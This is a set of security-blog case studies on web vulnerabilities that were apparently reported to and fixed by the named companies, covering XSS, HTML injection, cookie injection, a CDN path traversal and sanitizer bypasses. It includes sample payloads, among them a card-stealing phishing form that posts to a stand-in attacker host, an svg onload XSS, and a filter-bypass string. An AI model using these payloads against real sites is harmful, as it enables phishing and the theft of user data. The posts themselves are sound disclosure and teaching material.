DoS: Back From The Dead?

Stay updated on FogMarks

Happy 2018!

January is the perfect after-holidays time to point out our goals for the next year. And to lose some weight (because of the holidays), of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, after a long break, here we are again, discussing a vulnerability that many thought was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them addressed DoS as “an attack of the past”, as a vulnerability that cannot affect the server side anymore, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs don't accept DoS vulnerability submissions, and sometimes even forbid the researcher from testing for them, for fear of an effect on the system's stability and user experience. And they're right, sort of.

But who said that a DoS attack has to target the server? It takes two to tango: if the server is now "protected" against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: companies are so busy preventing DoS attacks on their servers that they forget DoS attacks are possible against users as well. A Denial of Service attack, by my definition, is any attack that prevents a user from accessing a resource or a service. This can be done by attacking the server directly (trying to make it shut down under excess traffic) or by attacking the users directly.

Actually, attacking the users is the easier way to do it. In addition, in many cases the company won't even know a user was attacked until the user contacts the company and says "Hey, I cannot access X".

You all know what I'm about to say now. Which type of vulnerability can cause a DoS against a specific user super fast? An XSS, of course!

Sending or planting an XSS payload that disrupts a certain service for specific users causes a severe denial of that service or resource. The payload can be a simple redirection off the site, or even a document.write() call that simply prints a blank page or a misleading one.
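To make this concrete, here is a minimal, hypothetical sketch of such a payload. The markup is my own invention (it is not the payload used in any real report); it is extracted into a function so it can be inspected outside a browser.

```javascript
// Hypothetical DoS-style XSS payload: instead of stealing data, it replaces
// the page with a misleading "404" so the victim believes the service is down.
function fake404Markup() {
  return [
    '<html><head><title>404 Not Found</title></head>',
    '<body><h1>Not Found</h1>',
    '<p>The requested URL was not found on this server.</p>',
    '</body></html>'
  ].join('');
}

// In a real payload this would run in the victim's browser, e.g.:
//   document.open(); document.write(fake404Markup()); document.close();
console.log(fake404Markup());
```

The victim's browser renders a convincing error page, and from the company's point of view nothing is wrong with the server at all.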

A certain very well-known commercial company, which hasn't yet allowed us to mention its name, suffered from that exact attack.
When I first started researching their main product, I was told not to DoS or DDoS their servers, "because we have anti-DDoS mechanisms that prevent that, and we think DoS attacks belong to the past". Of course, DoS from a different angle was the next thing I tried on their product 🙂

I came to understand that an XSS payload could be sent directly to a specific user or group of users. That XSS was "universal": it executed from any page of the site, because the messaging feature appeared on every page. I planted an XSS payload which simply echoed a mock "404 Not Found" page onto the page. To prove that the issue was indeed severe, the head of their security response team and I tested the attack on the production site, against one of the developers. His response ("WTF? What happened to the site?") was hilarious.

Although most modern servers are now protected against DoS and DDoS attacks thanks to smart load balancing and malicious-request blocking services, the user is still out there, unarmed and unprotected. You should always treat any attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of the vulnerability.

Happy & Successful 2018!

Phishing++ – Chapter II


Hi! Long-time-no-case-studied.
I know, I know, this chapter was supposed to be released two weeks ago, but we waited for PayPal's official permission to disclose these two vulnerabilities before even starting to write the case-study (why? Read our about page).

So, finally, PayPal has kindly allowed us to disclose two HTMLi/XSS vulnerabilities they had last summer, which is perfect, because now we can show you a real-life scenario that actually happened.
Before reading this, please make sure you have fully read and understood the previous chapter. This is vital for this final chapter; it's like you cannot start watching Breaking Bad from the second season (although I know a guy who did, because he was too lazy to download the first season. Weirdo.)

In the last chapter we talked about what companies can do to prevent 3rd-party malicious phishing websites from using their HTML assets, such as images, JS scripts and CSS style-sheets.
Today we are going to talk about the most dangerous and complicated phishing attacks: phishing attacks that occur on the official website.

In the past, phishing was super easy. New internet users didn't understand the importance, or even the existence, of an official domain. They were used to accessing their desired websites via a bookmark, via a mail someone sent them, and later on via Google.
Later, phishing became less easy. Companies started to warn their users against accessing their sites from dubious sources like email messages or forum links. They made their users aware of the domain part of the browser's address bar. And indeed, most users have adapted to these security precautions and now double-check the domain they're viewing before taking any action.

But no one prepared the companies for the new stage of phishing attacks: phishing on the companies' official websites! Imagine that a malicious, deceptive page is inserted into the website under the official company domain.
A malicious file doesn't even have to be uploaded: existing pages can be altered by attackers, using XSSes, HTML injections, header injections or parameter injections, and malicious content will be displayed.

Actually, there is only one TV series about "cyber" security I appreciate: CSI: Cyber. They presented this exact case of HTML injection in the 10th episode of the first season.

OK, now that we have learned how to swim, let's jump into the middle of the ocean.
PayPal suffered from two XSS/HTML injection vulnerabilities which allowed 3rd-party malicious content to be added to official PayPal pages, under the official PayPal domain.

This allowed us to create some very convincing phishing templates.

In addition, we were able to create an actual <form> inside a page, which allowed us to send victims' credit card data to a 3rd-party website. Unfortunately, we were not allowed to publish this demo.
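Since the real demo can't be shown, here is a purely generic illustration of the idea (the field names and the `https://attacker.example` URL are made up, and this is not the PayPal payload): an injected form that looks native to the page but posts its fields to a 3rd-party server.

```javascript
// Generic illustration of a phishing <form> an HTML injection makes possible.
// The exfiltration URL is a placeholder, not a real endpoint.
function phishingFormMarkup(exfilUrl) {
  return (
    `<form action="${exfilUrl}" method="POST">` +
    '<label>Card number <input name="cc" type="text"></label>' +
    '<label>CVV <input name="cvv" type="text"></label>' +
    '<input type="submit" value="Confirm payment">' +
    '</form>'
  );
}

console.log(phishingFormMarkup('https://attacker.example/collect'));
```

Because the form renders under the official domain, even a user who diligently checks the address bar has no reason to be suspicious.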

I even created an online 'Web Gun' content spoofer which can inject HTML entities directly into a vulnerable page.

The fix
Actually, there is no easy fix. Hunting down vulnerabilities and paying attention to payloads that are injected into the website's pages, whether via GET/POST requests or via SQL queries (in the case of a persistent XSS), is pretty much the best way to handle this threat.
XSS auditors, as PayPal's case shows, simply don't work.

Writing this two-chapter series was a lot of fun. Expect similar case-studies in the near future.
But till then,

Cookies And Scream

Whoa, What a summer!
I know, we haven't been active in the last month; blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over, and now it's time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I've talked enough about the importance of properly handling and sanitizing user-supplied input. There are tons of XSS and HTML filters out there, and they do a pretty good job.
But user input isn't always shown on the page or inserted into the DB. In some cases, popular web platforms store it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test;; path=/; Secure; HttpOnly

There's nothing evil about storing user-supplied input in a cookie; it's actually a good practice sometimes, if you don't want to use sessions or a similar mechanism.
A very common use for user-supplied input in a cookie is storing a redirect URL: sometimes you want to remember which page the user came from, or where to redirect him at the end of a process. Keep that in mind.
Before I get to the vulnerability itself, I'll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitization mechanism.

A well-known financing company had this exact cookie functionality. User input from some GET parameters was stored in cookies. For example, the value of the GET parameter 'redirect_url' was stored in the cookie 'return_url'. This cookie was then used by dozens of other pages to redirect users to a "thank you" page. An open-redirect attack on that parameter was not possible, because the value of the GET parameter 'redirect_url' was checked and verified before being set as a cookie.

At first glance, everything looked fine. I read the JS code responsible for sanitizing the input and determined that it was doing its job pretty well: no HTML entities or other "bad" characters (like ' or ") could be reflected, thanks to the encodeURI function, which was used intensively.

And then it hit me. encodeURI doesn't encode characters like ; or =, the exact characters used when setting a cookie!
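The difference is easy to verify in Node or a browser console (the payload value here is illustrative):

```javascript
// encodeURI leaves URI "structure" characters such as ';' and '=' intact,
// because they are legal in a full URI. encodeURIComponent encodes them.
const payload = 'xyz;return_url=evil';

console.log(encodeURI(payload));          // -> xyz;return_url=evil  (unchanged!)
console.log(encodeURIComponent(payload)); // -> xyz%3Breturn_url%3Devil
```

Since ';' and '=' are precisely the delimiters of the Set-Cookie syntax, a value run through encodeURI can smuggle extra cookie names and attributes into the header.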
So, I sent a GET request to the vulnerable URL, without the 'return_url' GET parameter (to prevent collisions):

GET;return_url= HTTP/1.1

HTTP/1.1 200 OK
Set-Cookie: vulnGETParameter=xyz;return_url=;; path=/; Secure; HttpOnly

In some cases, the result was an open redirect on pages that relied on the value of 'return_url' always being safe.

When you decide to store user input in a cookie, you must know how to treat it well, and you must remember to dispose of it when the time is right. In this case, using the same sanitization mechanism for input that will be shown on the page and for input that will be inserted into a cookie was the mistake.
The patch here was simple: encodeURIComponent() was used instead of encodeURI.

Happy & chilled autumn folks!

Independence Is Not a Dirty Word


Happy new year! This is the first post for year 2017.
I hope you guys aren't as hungover as I was. Seriously.

As promised in the last case-study, today we are going to see a very interesting case-study, with an interesting twist.

Everyone seems to love jQuery. This awesome JavaScript library is everywhere I look: tens of thousands of companies use it in their web applications, and it is super convenient, especially when it comes to AJAX requests. Importing jQuery makes our lives a whole lot easier.

A library of libraries

jQuery is not alone. Google and Microsoft (and sometimes Mozilla, Apple, Facebook and Twitter as well) release new JS libraries all the time, and advise developers to use them and import them into their products. For example, if you want to play a QuickTime video, you should import Apple's QuickTime JS library, and if you want that neat jQuery DatePicker, you should import that library from Google, jQuery or any other mirror.

Count how many times I used the word 'import' in the last paragraph. Done?
Whenever we want to use a public JS library that belongs to a certain company or service, we import it directly from that company.
To be clearer: we simply place a <script> tag on our website, with a 'src' attribute pointing to the JS file's address:

<script src="https://..."></script>

Did you get it? We are loading a script from another website, a 3rd-party website, into our own website's context. We are violating the number-one rule of web security: we trust another website!

Now, this might sound a little stupid

Why shouldn’t I be able to import a script from a trustworthy company like jQuery, Microsoft or Google? And you are right. Kind of.

When you import a script from a trustworthy company, 90% of the time you will be importing it from the company's CDN.
CDN stands for Content Delivery Network, which is (quoting) "a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server."
It's a hosting service which serves the company's content from different servers based on the client's location and a few other factors. The JS file you are importing is not kept on the company's official server (again, most of the time).

In this case-study we'll see how a very popular company fell for this.

This company (which, of course, we cannot reveal) has developed a popular JS library and hosted it on a 3rd party CDN they purchased. That CDN was “smart” and redirected users to the closest server according to the user’s location:

When a request arrived at the main server, the server determined the location of the request's IP and routed the request to the nearest server accordingly.

Dozens of websites planted a <script src> tag in their source code, pointing to that company's main CDN server, which provided their users with the necessary JS library.

An (un)pleasant surprise

After doing some research on the Apache server installed on Server C (Copy C in the image), we concluded that its version was really out of date, and that it was vulnerable to an arbitrary file upload attack, which allowed us to upload a file to the CDN (but not to execute code).
Not that serious, at first glance.

But! When we examined the way the file was uploaded (without authorization, of course), we saw that it was possible to use a directory traversal in the file path. We simply changed the filename to ../../../<company's domain>/<product name>/<version>/<jsfilename>.js and were able to replace the company's legitimate JS file with a malicious one.

Basically, we had an XSS on dozens of websites and companies, without conducting even one minute of research against them. The funny thing was that the attack affected only users who were directed to the vulnerable server (Server C).

What can we learn from this (TL;DR)

Never trust 3rd party websites and services to do your job! I told you that millions of times already. Be independent. Be a big boy that can stay alone in the house.

The safest solution is to manually download the JS library files you use and host them on your own server.

But what happens when the JS libraries I’m using get updated?

Clearly, with the suggested method there is no easy way to keep track of updates, besides using a package manager like Bower. All you'll have to do is synchronize your libraries every once in a while.

Before JavaScript package managers were popular, I advised a friend of mine to simply write a cronjob or a python script that checks the latest version of the JS library available on the company's server and compares it to the local one. If the versions differ, the script sends an email to the tech team.
Big JS libraries don't get updated that often.
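A rough sketch of that sync-check idea, in JavaScript for consistency with the rest of this post (the fetching and mailing parts are stubbed out; names are placeholders, not real endpoints):

```javascript
// Compare the locally hosted library version against the latest published one.
function needsUpdate(localVersion, upstreamVersion) {
  return localVersion !== upstreamVersion;
}

// Periodic check: fetch the upstream version (e.g. an HTTPS GET against the
// vendor's version endpoint) and notify the tech team on mismatch.
async function checkLibrary(fetchUpstreamVersion, localVersion, notify) {
  const upstream = await fetchUpstreamVersion();
  if (needsUpdate(localVersion, upstream)) {
    notify(`library out of date: local ${localVersion}, upstream ${upstream}`);
  }
}

console.log(needsUpdate('3.2.1', '3.3.0')); // true
```

Run it from cron once a day and you keep the independence of self-hosting without silently falling behind upstream releases.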

So, after the horror movie you've just watched, the next thing you are going to do, besides making coffee, is download your 3rd-party libraries to your own server.


JSON Escaping Out In The Wild (The 10-Minutes XSS)

This case-study focuses on the core aspects and utilities of JSON, specifically its escaping mechanism. SoundCloud, like many others, uses JSON to fetch user-related information from the server.
The idea is simple: the server first sends the client the HTML (and the JavaScript, CSS, images, etc.), and then the JavaScript code uses AJAX to fetch the data from the server.

In this case, the data returns from the server in JSON format, and the JavaScript code knows how to dissect it and insert the data into the right places on the page.
The returned data is escaped by the JSON escaper mechanism, so any malicious payloads (probably) won't work.

The main question that should be asked here is: can we exploit the way the browser fetches the data? Can we make it fetch arbitrary HTML or Javascript code?

Well, the short answer is no.
The long answer (10 minutes after starting this research) is yes.

At first, I decided to focus on the notifications area, where I noticed that AJAX requests are executed when scrolling down (to fetch old notifications).

I had previously inserted some payloads in various locations on SoundCloud, and analyzed the way the AJAX code asks for more notifications.
To safely print "bad" characters (', ", <, …), the JSON escaper escapes them by putting a \ char before each one.

And so I started thinking.

What if I do the escaping myself? Will the JSON escaper escape it again?

Well, it did. The JSON escaper mechanism double-escaped payloads that were already escaped. All that was left to do was to pre-escape a payload, which resulted in a stored XSS in the notifications area.

JSON escaping must be done properly
The only reason this worked is the developers' assumption that no one would "pre-escape" their input before submitting it. The JSON mechanism always escaped the input (by adding a \ before " or ' chars). If you expect users' input to be output by 3rd-party code, you should:
1. Never allow direct use of HTML/script tags. If you must, let users use 'special chars' to style their input (such as *bold* instead of <b>).
2. Know the mechanism. The JSON escaper adds a \ before " or ' chars. Therefore, if you accept these chars from the user, simply URL-encode them.
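A toy illustration of why a hand-rolled escaper that handles quotes but not backslashes is exploitable (this is my own sketch, not SoundCloud's actual code):

```javascript
const naiveEscape = s => s.replace(/"/g, '\\"');   // escapes quotes only
const embed = v => `{"msg":"${v}"}`;               // server builds JSON by hand

// Benign input round-trips fine:
console.log(JSON.parse(embed(naiveEscape('say "hi"'))).msg); // say "hi"

// Malicious input ends with a lone backslash: the escaper leaves it alone,
// it swallows the closing quote, and the attacker escapes the string context.
let broken = false;
try {
  JSON.parse(embed(naiveEscape('payload\\')));
} catch (e) {
  broken = true;
}
console.log(broken); // true

// JSON.stringify escapes backslashes too, so the same input is harmless:
console.log(JSON.parse(`{"msg":${JSON.stringify('payload\\')}}`).msg);
```

The moral matches point 2 above: use a serializer that knows the *whole* mechanism (like JSON.stringify) instead of escaping a hand-picked list of "bad" characters.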

I'll use this opportunity to note that SoundCloud's response team was the fastest I have ever worked with. Take a look at the disclosure timeline.

Disclosure Timeline
13/02/2016 23:00 – Vulnerability found & reported.
14/02/2016 08:00 – Vulnerability confirmed by SoundCloud.
14/02/2016 14:00 – Vulnerability patched and bounty awarded (HoF + Swag).

Ancient Purifying


One of the first XSSes I ever found was the easiest one you can imagine. There are millions, yes, millions, of websites that sanitize user input, but sanitize it wrong.

Why? Because they're complacent, and because they don't update their sanitizing algorithms according to the latest black/white-hat community discoveries.

Purifying Basics

Basically, user input should never be output as HTML code. The server, as a rule, should not accept HTML tags, and when you do decide to accept them, you need to sanitize properly. Why? Because a small mistake in the regex you write will let attackers plant stored or reflected XSSes that will jeopardize your users. And you.
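A classic example of that "small mistake in the regex" (a textbook bypass, not tied to any specific site mentioned here): stripping the literal string `<script>` looks safe, but the removal itself can assemble a new tag from the surrounding characters.

```javascript
// Broken: removes "<script>" once, but the removal splices a new tag together.
const naiveSanitize = html => html.replace(/<script>/gi, '');

const payload = '<scr<script>ipt>alert(1)';
console.log(naiveSanitize(payload)); // -> <script>alert(1)

// Safer: encode the metacharacters instead of trying to delete tags.
const encodeHtml = s =>
  s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
console.log(encodeHtml(payload)); // -> &lt;scr&lt;script&gt;ipt&gt;alert(1)
```

Deny-list deletion has to be applied repeatedly until a fixed point (and even then it's fragile); encoding sidesteps the whole class of splicing tricks.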

An example of this statement is an ongoing report of mine. A certain site is vulnerable to a very simple stored-XSS attack, using a very simple payload, which of course I will not disclose until they fix the issue (the vulnerability submission has been awaiting their response since 2015 (!)).
The rule with sophisticated platforms is to KISS (keep it super simple). Known XSSes will probably not work, since a trained security team monitors these systems all the time and the sanitizing algorithm is updated frequently.

3rd-party Purifiers aren’t always the answer

As you already know, I don't believe your security should be left to 3rd-party software. If you are enough of a "big boy" to store sensitive user data (of any kind), you should also be responsible enough to keep that data safe.
Use your own sanitizing mechanism, based on the simple 'do not accept HTML/script tags' rule and on recent community discoveries.

Test your mechanism, open-source it

Perfection doesn't always have its price (sorry, Stella). A perfect input-purifier mechanism becomes one only with the help of the community. Therefore, allow pentesters to challenge your mechanism when you think it's vital enough. @soaj1664ashar did exactly that with his version of an input purifier. You are strongly advised to look at his post about it (Google it).


To finish up, I'll leave you with this outstanding quote, which basically sums up everything we discussed:

“Security is not a product, but a process” -Bruce Schneier.

Happy new year!

When Previewing Becomes Dangerous


Previewing is cool. A lot of websites and services offer a 'preview before posting' or 'preview before buying' option.
But sometimes previewing becomes a dirty business. Like in the case-study you're about to read.

Feature Stretching offers an ‘Invoice Preview’ feature before you send an invoice request to another user on their web (or via email). You enters an invoice message on a simple, small textbox. HTML and Javascript codes are being forbidden and escaped when the message is sent.
Before sending the invoice, your are allowed to preview the message you are about to send to the client. Clicking on the preview button opens a pop up window which shows an example of the invoice.

When I clicked on 'preview', I noticed that the 'Enter' char I had inserted was translated to a '<br />' string in the GET message-body parameter (in the URL). Changing the input to </script><svg onload=alert(document.domain)></svg> didn't work. That was the stage where I started to think.

Fun Part

I decided to analyze each GET parameter in the request, and noticed that one of them referred to a template id.
The template wrapped the message with some nice CSS and images. It changed the background color, the foreground color and the font of the input. Then I figured: "Hmm, the template determines the input's font. Maybe it also reads the input and applies an XSS filter to it?"

I wondered: what if the template id pointed to a non-existent template? I changed the id to some random number, entered the XSS payload again and bam. It worked.



The XSS filter was set per-template, which means it worked only when an existing template id was supplied. When I supplied a non-existent template id, there was no XSS filter and no nice CSS or images, but the payload was still rendered, which resulted in a nice reflected XSS.


Allowing only some of the parameters of a request to affect the output can be risky. Always be aware of the impact and the importance of every parameter you use, even the smallest one.

Blinksale patched this issue and personally thanked me via email.